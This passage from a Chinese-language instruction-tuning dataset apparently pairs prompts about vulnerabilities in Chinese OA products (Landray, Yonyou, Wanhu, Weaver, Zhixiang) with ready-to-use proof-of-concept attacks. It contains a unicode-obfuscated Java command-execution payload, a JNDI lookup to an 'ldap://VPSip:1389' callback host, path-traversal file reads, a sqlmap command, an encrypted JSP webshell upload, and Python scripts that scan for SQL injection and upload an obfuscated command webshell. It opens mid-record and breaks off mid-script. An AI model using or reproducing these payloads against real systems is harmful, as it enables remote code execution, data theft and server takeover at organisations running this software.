\\u0028\\u0022\\u0067\\u0065\\u0074\\u0052\\u0065\\u0073\\u0070\\u006f\\u006e\\u0073\\u0065\\u0022\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u005b\\u0030\\u005d\\u0029\\u002e\\u0069\\u006e\\u0076\\u006f\\u006b\\u0065\\u0028\\u0072\\u0065\\u0071\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u005b\\u0030\\u005d\\u0029\\u003b\\u0073\\u0074\\u0072\\u0020\\u003d\\u0020\\u0028\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u0029\\u0020\\u0072\\u0065\\u0071\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0028\\u0022\\u0067\\u0065\\u0074\\u0048\\u0065\\u0061\\u0064\\u0065\\u0072\\u0022\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u005b\\u005d\\u007b\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u002e\\u0063\\u006c\\u0061\\u0073\\u0073\\u007d\\u0029\\u002e\\u0069\\u006e\\u0076\\u006f\\u006b\\u0065\\u0028\\u0072\\u0065\\u0071\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u005b\\u005d\\u007b\\u0022\\u0043\\u006d\\u0064\\u0022\\u007d\\u0029\\u003b\\u0069\\u0066\\u0020\\u0028\\u0073\\u0074\\u0072\\u0020\\u0021\\u003d\\u0020\\u006e\\u0075\\u006c\\u006c\\u0020\\u0026\\u0026\\u0020\\u0021\\u0073\\u0074\\u0072\\u002e\\u0069\\u0073\\u0045\\u006d\\u0070\\u0074\\u0079\\u0028\\u0029\\u0029\\u0020\\u007b\\u0020\\u0072\\u0065\\u0073\\u0070\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0028\\u0022\\u0073\\u0065\\u0074\\u0053\\u0074\\u0061\\u0074\\u0075\\u0073\\u0022\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u005b\\u005d\\u007b\\u0069\\u006e\\u0074\\u002e\\u0063\\u006c\\u0061\\u0073\\u0073\\u007d\\u0029\\u002e\\u0069\\u006e\\u0076\\u006f\\u006b\\u0065\\u0028\\u0072\\u0065\\u0073\\u0070\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u005b\\u005d\\u007b\\u006e\\u0065\\u0077\\u0020\\u0049\\u006e\\u0074\\u0065\\u0067\\u0065\\u0072\\u0028\\u0032\\u0030\\u0030\\u0029\\u007d\\u0029\\u003b\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u005b\\u005d\\u0020\\u0063\\u006d\\u0064\\u0073\\u0020\\u003d\\u0020\\u0053\\u0079\\u0073\\u0074\\u0065\\u006d\\u002e\\u0067\\u0065\\u0074\\u0050\\u0072\\u006f\\u0070\\u0065\\u0072\\u0074\\u0079\\u0028\\u0022\\u006f\\u0073\\u002e\\u006e\\u0061\\u006d\\u0065\\u0022\\u0029\\u002e\\u0074\\u006f\\u004c\\u006f\\u0077\\u0065\\u0072\\u0043\\u0061\\u0073\\u0065\\u0028\\u0029\\u002e\\u0063\\u006f\\u006e\\u0074\\u0061\\u0069\\u006e\\u0073\\u0028\\u0022\\u0077\\u0069\\u006e\\u0064\\u006f\\u0077\\u0022\\u0029\\u0020\\u003f\\u0020\\u006e\\u0065\\u0077\\u0020\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u005b\\u005d\\u007b\\u0022\\u0063\\u006d\\u0064\\u002e\\u0065\\u0078\\u0065\\u0022\\u002c\\u0020\\u0022\\u002f\\u0063\\u0022\\u002c\\u0020\\u0073\\u0074\\u0072\\u007d\\u0020\\u003a\\u0020\\u006e\\u0065\\u0077\\u0020\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u005b\\u005d\\u007b\\u0022\\u002f\\u0062\\u0069\\u006e\\u002f\\u0073\\u0068\\u0022\\u002c\\u0020\\u0022\\u002d\\u0063\\u0022\\u002c\\u0020\\u0073\\u0074\\u0072\\u007d\\u003b\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u0020\\u0063\\u0068\\u0061\\u0072\\u0073\\u0065\\u0074\\u004e\\u0061\\u006d\\u0065\\u0020\\u003d\\u0020\\u0053\\u0079\\u0073\\u0074\\u0065\\u006d\\u002e\\u0067\\u0065\\u0074\\u0050\\u0072\\u006f\\u0070\\u0065\\u0072\\u0074\\u0079\\u0028\\u0022\\u006f\\u0073\\u002e\\u006e\\u0061\\u006d\\u0065\\u0022\\u0029\\u002e\\u0074\\u006f\\u004c\\u006f\\u0077\\u0065\\u0072\\u0043\\u0061\\u0073\\u0065\\u0028\\u0029\\u002e\\u0063\\u006f\\u006e\\u0074\\u0061\\u0069\\u006e\\u0073\\u0028\\u0022\\u0077\\u0069\\u006e\\u0064\\u006f\\u0077\\u0022\\u0029\\u0020\\u003f\\u0020\\u0022\\u0047\\u0042\\u004b\\u0022\\u003a\\u0022\\u0055\\u0054\\u0046\\u002d\\u0038\\u0022\\u003b\\u0062\\u0079\\u0074\\u0065\\u005b\\u005d\\u0020\\u0074\\u0065\\u0078\\u0074\\u0032\\u0020\\u003d\\u0028\\u006e\\u0065\\u0077\\u0020\\u006a\\u0061\\u0076\\u0061\\u002e\\u0075\\u0074\\u0069\\u006c\\u002e\\u0053\\u0063\\u0061\\u006e\\u006e\\u0065\\u0072\\u0028\\u0028\\u006e\\u0065\\u0077\\u0020\\u0050\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u0042\\u0075\\u0069\\u006c\\u0064\\u0065\\u0072\\u0028\\u0063\\u006d\\u0064\\u0073\\u0029\\u0029\\u002e\\u0073\\u0074\\u0061\\u0072\\u0074\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0049\\u006e\\u0070\\u0075\\u0074\\u0053\\u0074\\u0072\\u0065\\u0061\\u006d\\u0028\\u0029\\u002c\\u0063\\u0068\\u0061\\u0072\\u0073\\u0065\\u0074\\u004e\\u0061\\u006d\\u0065\\u0029\\u0029\\u002e\\u0075\\u0073\\u0065\\u0044\\u0065\\u006c\\u0069\\u006d\\u0069\\u0074\\u0065\\u0072\\u0028\\u0022\\u005c\\u005c\\u0041\\u0022\\u0029\\u002e\\u006e\\u0065\\u0078\\u0074\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0042\\u0079\\u0074\\u0065\\u0073\\u0028\\u0063\\u0068\\u0061\\u0072\\u0073\\u0065\\u0074\\u004e\\u0061\\u006d\\u0065\\u0029\\u003b\\u0062\\u0079\\u0074\\u0065\\u005b\\u005d\\u0020\\u0072\\u0065\\u0073\\u0075\\u006c\\u0074\\u003d\\u0028\\u0022\\u0045\\u0078\\u0065\\u0063\\u0075\\u0074\\u0065\\u003a\\u0020\\u0020\\u0020\\u0020\\u0022\\u002b\\u006e\\u0065\\u0077\\u0020\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u0028\\u0074\\u0065\\u0078\\u0074\\u0032\\u002c\\u0022\\u0075\\u0074\\u0066\\u002d\\u0038\\u0022\\u0029\\u0029\\u002e\\u0067\\u0065\\u0074\\u0042\\u0079\\u0074\\u0065\\u0073\\u0028\\u0063\\u0068\\u0061\\u0072\\u0073\\u0065\\u0074\\u004e\\u0061\\u006d\\u0065\\u0029\\u003b\\u0074\\u0072\\u0079\\u0020\\u007b\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u0020\\u0063\\u006c\\u0073\\u0020\\u003d\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u002e\\u0066\\u006f\\u0072\\u004e\\u0061\\u006d\\u0065\\u0028\\u0022\\u006f\\u0072\\u0067\\u002e\\u0061\\u0070\\u0061\\u0063\\u0068\\u0065\\u002e\\u0074\\u006f\\u006d\\u0063\\u0061\\u0074\\u002e\\u0075\\u0074\\u0069\\u006c\\u002e\\u0062\\u0075\\u0066\\u002e\\u0042\\u0079\\u0074\\u0065\\u0043\\u0068\\u0075\\u006e\\u006b\\u0022\\u0029\\u003b\\u006f\\u0062\\u006a\\u0020\\u003d\\u0020\\u0063\\u006c\\u0073\\u002e\\u006e\\u0065\\u0077\\u0049\\u006e\\u0073\\u0074\\u0061\\u006e\\u0063\\u0065\\u0028\\u0029\\u003b\\u0063\\u006c\\u0073\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0028\\u0022\\u0073\\u0065\\u0074\\u0042\\u0079\\u0074\\u0065\\u0073\\u0022\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u005b\\u005d\\u007b\\u0062\\u0079\\u0074\\u0065\\u005b\\u005d\\u002e\\u0063\\u006c\\u0061\\u0073\\u0073\\u002c\\u0020\\u0069\\u006e\\u0074\\u002e\\u0063\\u006c\\u0061\\u0073\\u0073\\u002c\\u0020\\u0069\\u006e\\u0074\\u002e\\u0063\\u006c\\u0061\\u0073\\u0073\\u007d\\u0029\\u002e\\u0069\\u006e\\u0076\\u006f\\u006b\\u0065\\u0028\\u006f\\u0062\\u006a\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u005b\\u005d\\u007b\\u0072\\u0065\\u0073\\u0075\\u006c\\u0074\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0049\\u006e\\u0074\\u0065\\u0067\\u0065\\u0072\\u0028\\u0030\\u0029\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0049\\u006e\\u0074\\u0065\\u0067\\u0065\\u0072\\u0028\\u0072\\u0065\\u0073\\u0075\\u006c\\u0074\\u002e\\u006c\\u0065\\u006e\\u0067\\u0074\\u0068\\u0029\\u007d\\u0029\\u003b\\u0072\\u0065\\u0073\\u0070\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0028\\u0022\\u0064\\u006f\\u0057\\u0072\\u0069\\u0074\\u0065\\u0022\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u005b\\u005d\\u007b\\u0063\\u006c\\u0073\\u007d\\u0029\\u002e\\u0069\\u006e\\u0076\\u006f\\u006b\\u0065\\u0028\\u0072\\u0065\\u0073\\u0070\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u005b\\u005d\\u007b\\u006f\\u0062\\u006a\\u007d\\u0029\\u003b\\u0020\\u007d\\u0020\\u0063\\u0061\\u0074\\u0063\\u0068\\u0020\\u0028\\u004e\\u006f\\u0053\\u0075\\u0063\\u0068\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0020\\u0076\\u0061\\u0072\\u0035\\u0029\\u0020\\u007b\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u0020\\u0063\\u006c\\u0073\\u0020\\u003d\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u002e\\u0066\\u006f\\u0072\\u004e\\u0061\\u006d\\u0065\\u0028\\u0022\\u006a\\u0061\\u0076\\u0061\\u002e\\u006e\\u0069\\u006f\\u002e\\u0042\\u0079\\u0074\\u0065\\u0042\\u0075\\u0066\\u0066\\u0065\\u0072\\u0022\\u0029\\u003b\\u006f\\u0062\\u006a\\u0020\\u003d\\u0020\\u0063\\u006c\\u0073\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0028\\u0022\\u0077\\u0072\\u0061\\u0070\\u0022\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u005b\\u005d\\u007b\\u0062\\u0079\\u0074\\u0065\\u005b\\u005d\\u002e\\u0063\\u006c\\u0061\\u0073\\u0073\\u007d\\u0029\\u002e\\u0069\\u006e\\u0076\\u006f\\u006b\\u0065\\u0028\\u0063\\u006c\\u0073\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u005b\\u005d\\u007b\\u0072\\u0065\\u0073\\u0075\\u006c\\u0074\\u007d\\u0029\\u003b\\u0072\\u0065\\u0073\\u0070\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0028\\u0022\\u0064\\u006f\\u0057\\u0072\\u0069\\u0074\\u0065\\u0022\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u005b\\u005d\\u007b\\u0063\\u006c\\u0073\\u007d\\u0029\\u002e\\u0069\\u006e\\u0076\\u006f\\u006b\\u0065\\u0028\\u0072\\u0065\\u0073\\u0070\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u005b\\u005d\\u007b\\u006f\\u0062\\u006a\\u007d\\u0029\\u003b\\u0020\\u007d\\u0066\\u006c\\u0061\\u0067\\u0020\\u003d\\u0020\\u0074\\u0072\\u0075\\u0065\\u003b\\u0020\\u007d\\u0069\\u0066\\u0020\\u0028\\u0066\\u006c\\u0061\\u0067\\u0029\\u0020\\u007b\\u0020\\u0062\\u0072\\u0065\\u0061\\u006b\\u003b\\u0020\\u007d\\u0020\\u007d\\u0069\\u0066\\u0020\\u0028\\u0066\\u006c\\u0061\\u0067\\u0029\\u0020\\u007b\\u0020\\u0062\\u0072\\u0065\\u0061\\u006b\\u003b\\u0020\\u007d\\u0020\\u007d\\u0020\\u0063\\u0061\\u0074\\u0063\\u0068\\u0020\\u0028\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0020\\u0065\\u0029\\u0020\\u007b\\u0020\\u0063\\u006f\\u006e\\u0074\\u0069\\u006e\\u0075\\u0065\\u003b\\u0020\\u007d\\u0020\\u007d\n</string></void></void></java>\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/蓝凌OA sysSearchMain.do 远程命令执行漏洞.md"}
    995. 

  995. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 NC Cloud jsinvoke 任意文件上传漏洞\n漏洞描述:用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器中,获取系统权限\n影响版本:用友 NC Cloud\n网络测绘:``` app=\"用友-NC-Cloud\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"用友-NC-Cloud\"\n2. POST /uapjs/jsinvoke/?action=invoke\nContent-Type: application/json\n\n{\n    \"serviceName\":\"nc.itf.iufo.IBaseSPService\",\n    \"methodName\":\"saveXStreamConfig\",\n    \"parameterTypes\":[\n        \"java.lang.Object\",\n        \"java.lang.String\"\n    ], \n    \"parameters\":[\n        \"${param.getClass().forName(param.error).newInstance().eval(param.cmd)}\",\n        \"webapps/nc_web/407.jsp\"\n    ]\n}\nPOST /uapjs/jsinvoke/?action=invoke HTTP/1.1\nHost: \nConnection: Keep-Alive\nContent-Length: 253\nContent-Type: application/x-www-form-urlencoded\n\n\n{\"serviceName\":\"nc.itf.iufo.IBaseSPService\",\"methodName\":\"saveXStreamConfig\",\"parameterTypes\":[\"java.lang.Object\",\"java.lang.String\"],\"parameters\":[\"${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}\",\"webapps/nc_web/301.jsp\"]}\n3. /cmdtest.jsp?error=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec(%22whoami%22).getInputStream())\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/用友 NC Cloud jsinvoke 任意文件上传漏洞.md"}
    996. 

  996. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:万户OA download_old.jsp 任意文件下载漏洞\n漏洞描述:万户OA download_old.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件\n影响版本:``` 万户OA ```\n网络测绘:``` app=\"万户网络-ezOFFICE\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"万户网络-ezOFFICE\"\n2. /defaultroot/download_old.jsp?path=..&name=x&FileName=index.jsp\n/defaultroot/download_old.jsp?path=..&name=x&FileName=WEB-INF/web.xml\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/万户OA download_old.jsp 任意文件下载漏洞.md"}
    997. 

  997. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:致翔OA msglog.aspx SQL注入漏洞\n漏洞描述:致翔OA msglog.aspx文件存在SQL注入漏洞,攻击者通过漏洞可获取敏感信息\n影响版本:``` 致翔OA ```\n网络测绘:``` app=\"致翔软件-致翔OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"致翔软件-致翔OA\"\n2. /mainpage/msglog.aspx?user=1\n3. sqlmap -u http://127.0.0.1/mainpage/msglog.aspx?user=1 -p user --batch\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/致翔OA msglog.aspx SQL注入漏洞.md"}
    998. 

  998. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件读取漏洞\n漏洞描述:用友 U8 CRM客户关系管理系统 getemaildata.php 存在任意文件读取漏洞,攻击者通过漏洞可以获取到服务器中的敏感文件\n影响版本:用友 U8 CRM客户关系管理系统\n网络测绘:``` web.body=\"用友U8CRM\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. web.body=\"用友U8CRM\"\n2. /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini\n3. 用友 U8 CRM客户关系管理系统 getemaildata.php 存在任意文件读取漏洞,攻击者通过漏洞可以获取到服务器中的敏感文件\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件读取漏洞.md"}
    999. 

  999. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:万户OA OfficeServer.jsp 任意文件上传漏洞\n漏洞描述:万户OA 除了 /defaultroot/officeserverservlet 接口外的另一处接口 OfficeServer.jsp 同时也存在任意文件上传漏洞,导致攻击者可上传任意文件获取服务器权限\n影响版本:``` 万户OA ```\n网络测绘:``` app=\"万户网络-ezOFFICE\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"万户网络-ezOFFICE\"\n2. POST /defaultroot/public/iWebOfficeSign/OfficeServer.jsp HTTP/1.1\nHost: \nPragma: no-cache\nCache-Control: no-cache\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nCookie: OASESSIONID=847AE3A2E5D155AE7FB1CD2C6736CD66\nx-forwarded-for: 127.0.0.1\nx-originating-ip: 127.0.0.1\nx-remote-ip: 127.0.0.1\nx-remote-addr: 127.0.0.1\nConnection: close\nContent-Length: 798\n\t\t\nDBSTEP V3.0     170              0                1000              DBSTEP=REJTVEVQ\nOPTION=U0FWRUZJTEU=\nRECORDID=\nisDoc=dHJ1ZQ==\nmoduleType=Z292ZG9jdW1lbnQ=\nFILETYPE=Li4vLi4vcHVibGljL2VkaXQvY21kX3Rlc3QuanNw\n111111111111111111111111111111111111111111111111\n<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>\n3. /defaultroot/public/edit/cmd_test.jsp\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/万户OA OfficeServer.jsp 任意文件上传漏洞.md"}
    1000. 

  1000. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 U8 OA test.jsp SQL注入漏洞\n漏洞描述:用友 U8 OA test.jsp文件存在 SQL注入漏洞,由于与致远OA使用相同的文件,于是存在了同样的漏洞\n影响版本:``` 用友 U8 OA ```\n网络测绘:``` \"用友U8-OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))\n2. import requests\nimport sys\nimport random\nimport re\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\ndef title():\n    print('+------------------------------------------')\n    print('+  \\033[34mPOC_Des: http://wiki.peiqi.tech                                   \\033[0m')\n    print('+  \\033[34mGithub : https://github.com/PeiQi0                                 \\033[0m')\n    print('+  \\033[34m公众号  : PeiQi文库                                                   \\033[0m')\n    print('+  \\033[34mTitle\t : 用友 U8 OA test.jsp SQL注入漏洞                           \\033[0m')\n    print('+  \\033[36m使用格式:  python3 poc.py                                            \\033[0m')\n    print('+  \\033[36mFile         >>> ip.txt                             \\033[0m')\n    print('+------------------------------------------')\n\ndef POC_1(target_url):\n    vuln_url = target_url + \"/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1))\"\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\",\n    }\n    try:\n        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)\n        if \"c4ca4238a0b923820dcc509a6f75849b\" in response.text and response.status_code == 200:\n            print(\"\\033[32m[o] 目标 {}存在漏洞 \\n[o] 响应地址: {} \\033[0m\".format(target_url, vuln_url))\n        else:\n            print(\"\\033[31m[x] 目标 {}不存在漏洞 \\033[0m\".format(target_url))\n    except Exception as e:\n        print(\"\\033[31m[x] 目标 {} 请求失败 \\033[0m\".format(target_url))\n\nif __name__ == '__main__':\n    title()\n    target_url = str(input(\"\\033[35mPlease input Attack Url\\nUrl >>> \\033[0m\"))\n    POC_1(target_url)\n3. def POC_1(target_url):\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/用友 U8 OA test.jsp SQL注入漏洞.md"}
    1001. 

  1001. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA E-Office uploadify 任意文件上传漏洞\n漏洞描述:泛微OA E-Office 在 uploadify.php 中上传文件过滤不严格导致允许无限制地上传文件,攻击者可以通过该漏洞直接获取网站权限\n影响版本:泛微OA E-Office10\n网络测绘:``` app=\"泛微-EOffice\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"泛微-EOffice\"\n2. <?php\ninclude_once(\"inc/vulnerability.php\");\nif (!empty($_FILES)) {\n    $tempFile = $_FILES['Filedata']['tmp_name'];\n    //获取扩展名\n    if (!strrpos($tempFile, \".\")) {\n        echo \"\";\n        exit;\n    }\n    $fileExt = substr($tempFile, strrpos($tempFile, \".\") + 1);\n    $attachmentID = createFileDir();\n    $uploadPath = $_REQUEST[\"uploadPath\"];\n\n    if (trim($uploadPath) == \"\") {\n        $targetPath = $_SERVER['DOCUMENT_ROOT'] . '/attachment/' . $attachmentID;\n    } else {\n        $targetPath = $uploadPath . '/sent/attachment/' . $attachmentID;\n    }\n\n    if (!file_exists($targetPath)) {\n        mkdir($targetPath, 0777, true);\n    }\n\n    $targetFile = str_replace('//', '/', $targetPath) . \"/\" . $_FILES['Filedata']['name'];\n    isIllegalUploadFile($targetFile);\n    move_uploaded_file($tempFile, iconv(\"UTF-8\", \"GBK\", $targetFile));\n    echo $attachmentID;\n}\n\nfunction createFileDir() {\n    global $ATTACH_PATH;\n    mt_srand((double) microtime() * 1000000);\n    $RADOM_ID = mt_rand() + mt_rand();\n    if (!file_exists($ATTACH_PATH . $RADOM_ID))\n        return $RADOM_ID;\n    else\n        createFileDir();\n}\n\n?>\n3. POST /inc/jquery/uploadify/uploadify.php HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36\nConnection: close\nContent-Length: 259\nContent-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4\nAccept-Encoding: gzip\n\n--e64bdf16c554bbc109cecef6451c26a4\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"2TrZmO0y0SU34qUcUGHA8EXiDgN.php\"\nContent-Type: image/jpeg\n\n<?php echo \"2TrZmO0y0SU34qUcUGHA8EXiDgN\";unlink(__FILE__);?>\n\n--e64bdf16c554bbc109cecef6451c26a4--\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA E-Office uploadify 任意文件上传漏洞.md"}
    1002. 

  1002. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA weaver.common.Ctrl 任意文件上传漏洞\n漏洞描述:泛微OA weaver.common.Ctrl 存在任意文件上传漏洞,攻击者通过漏洞可以上传webshell文件控制服务器\n影响版本:``` 泛微OA ```\n网络测绘:``` app=\"泛微-协同办公OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"泛微-协同办公OA\"\n2. /weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp\n3. import zipfile\nimport random\nimport sys\nimport requests\n\n\n\ndef generate_random_str(randomlength=16):\n  random_str = ''\n  base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'\n  length = len(base_str) - 1\n  for i in range(randomlength):\n    random_str += base_str[random.randint(0, length)]\n  return random_str\n\nmm = generate_random_str(8)\n\nwebshell_name1 = mm+'.jsp'\nwebshell_name2 = '../../../'+webshell_name1\n\ndef file_zip():\n    shell = \"\"\"<%@ page contentType=\"text/html;charset=UTF-8\" language=\"java\" %>\n<%@ page import=\"sun.misc.BASE64Decoder\" %>\n<%\n    if(request.getParameter(\"cmd\")!=null){\n        BASE64Decoder decoder = new BASE64Decoder();\n        Class rt = Class.forName(new String(decoder.decodeBuffer(\"amF2YS5sYW5nLlJ1bnRpbWU=\")));\n        Process e = (Process)\n                rt.getMethod(new String(decoder.decodeBuffer(\"ZXhlYw==\")), String.class).invoke(rt.getMethod(new\n                        String(decoder.decodeBuffer(\"Z2V0UnVudGltZQ==\"))).invoke(null, new\n                        Object[]{}), request.getParameter(\"cmd\") );\n        java.io.InputStream in = e.getInputStream();\n        int a = -1;\n        byte[] b = new byte[2048];\n        out.print(\"\n<pre>\");\n        while((a=in.read(b))!=-1){\n            out.println(new String(b));\n        }\n        out.print(\"</pre>\");\n    }\n%>\n    \"\"\"   ## 替换shell内容\n    zf = zipfile.ZipFile(mm+'.zip', mode='w', compression=zipfile.ZIP_DEFLATED)\n    zf.writestr(webshell_name2, shell)\n\ndef GetShell(urllist):\n    file_zip()\n    print('上传文件中')\n    urls = urllist + '/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp'\n    file = [('file1', (mm+'.zip', open(mm + '.zip', 'rb'), 'application/zip'))]\n    requests.post(url=urls,files=file,timeout=60, verify=False)\n    GetShellurl = urllist+'/cloudstore/'+webshell_name1\n    GetShelllist = requests.get(url = GetShellurl)\n    if GetShelllist.status_code == 200:\n        print('利用成功webshell地址为:'+GetShellurl)\n    else:\n        print('未找到webshell利用失败')\n\ndef main():\n    if (len(sys.argv) == 